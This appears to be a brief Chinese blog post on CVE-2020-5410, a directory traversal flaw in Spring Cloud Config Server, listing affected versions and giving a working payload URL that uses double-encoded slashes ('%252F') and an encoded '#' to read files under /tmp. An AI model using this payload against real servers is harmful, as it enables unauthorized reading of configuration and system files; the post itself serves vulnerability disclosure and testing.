Spring Cloud Config Server 目录遍历漏洞(CVE-2020-5410)

Spring Cloud Config Server 目录遍历漏洞(CVE-2020-5410)

概述
较旧的不受支持的版本允许应用程序通过 spring-cloud-config-server 模块提供任意配置文件

影响范围
2.1.x<Spring Cloud Config版本 <2.2.x

目标站点
image

目录遍历
pyload:

http://xx.xx/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23/666

其中/两次URL加密%252F#一次URL加密%23
image

posted @   LinkPoc  阅读(631)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示